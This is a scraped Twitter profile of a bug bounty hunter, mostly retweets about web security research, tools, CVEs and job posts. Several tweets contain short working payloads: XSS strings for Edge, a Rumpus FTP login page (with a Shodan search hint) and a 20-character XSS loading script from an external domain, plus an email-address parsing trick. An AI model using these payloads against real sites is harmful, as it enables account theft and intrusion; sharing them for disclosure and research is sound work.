Cosmin

@inhibitor181

Bug bounty hunter

Germany
Joined: May 2017

Tweets

  1. Retweeted
    Jan 31

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

  2. Retweeted
    Jan 28

    I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suit is web and mobile security, with lots of bug bounty experience. My resume and contact info are on , DMs open as well. RT's are much appreciated.

  3. Retweeted
    Jan 27

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? this could lead to interesting exploit scenarios with some email parsing libraries/code

  4. Retweeted
    Jan 25
  5. Retweeted
    Jan 19

    I have made a demo application to abuse Google Chrome cache by exploiting CORS. The code is big messy but it works. Original research was from Reviews are appreciated :-)

  6. Retweeted
    Jan 10

    Citrix ADC/Netscaler RCE (CVE-2019-19781) 😬

  7. Retweeted
    Jan 7
  8. Retweeted
    Jan 7

    Hi all, dropping another tool today. This one is very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). Check it out:

  9. Retweeted
    Jan 6

    One of the scarier bugs I’ve found: with Microsoft’s go-ahead & after many hours spent, I’m excited to finally publish this writeup and PoC! 👩🏼‍💻

  10. Retweeted
    Jan 5

    Australia is on fire right now! What if we all donate 1 or 2 dollars? Maybe we can help save hundreds of animals in danger. To all my friends doing bug bounty, what’s one dollar? 1% of a low risk bug? if you can’t donate, plz RT! Thanks!!

  11. Retweeted
    Jan 3

    FINALLY releasing hakrawler! A web crawler for hackers! Check out the blog post for details.

  12. Retweeted
    Dec 31, 2019

    Microsoft Edge (And Internet Explorer) is the only browser that allows running JavaScript from a <script> without the end tag <script async src=data:,alert(1)>

  13. Dec 30, 2019
  14. Retweeted
    Dec 24, 2019
  15. Retweeted
    Dec 20, 2019
  16. Retweeted
    Dec 18, 2019

    Rumpus FTP Web File Manager has an XSS at the login page. Just visit: http://example[.]com/Login?!'><svg/onload="XSS"> Anything after the character "!" will be inserted inside the HTML without encoding. Search on Shodan:

  17. Retweeted
    Dec 16, 2019

    Finally got the approval, Here are multiple Linode's access token stealing/account takeover bugs, I like the second one. Retweet if you like it.

  18. Retweeted

    Just posted From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 - to be followed up with a second writeup on bug I've found with these tools.

  19. Retweeted
    Dec 13, 2019

    The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting UI. Understand its impact + learn to safely patch your software in this post from : (With thanks to + )

  20. Retweeted
    Dec 3, 2019

    Exploiting XSS with 20 characters limitation Notice that ff characters is only one character but when browsers interpret it, it will be expanded as ff two characters. This opens the door to buy larger domains, in a cheaper way. <script src=//℡㏛.pw>
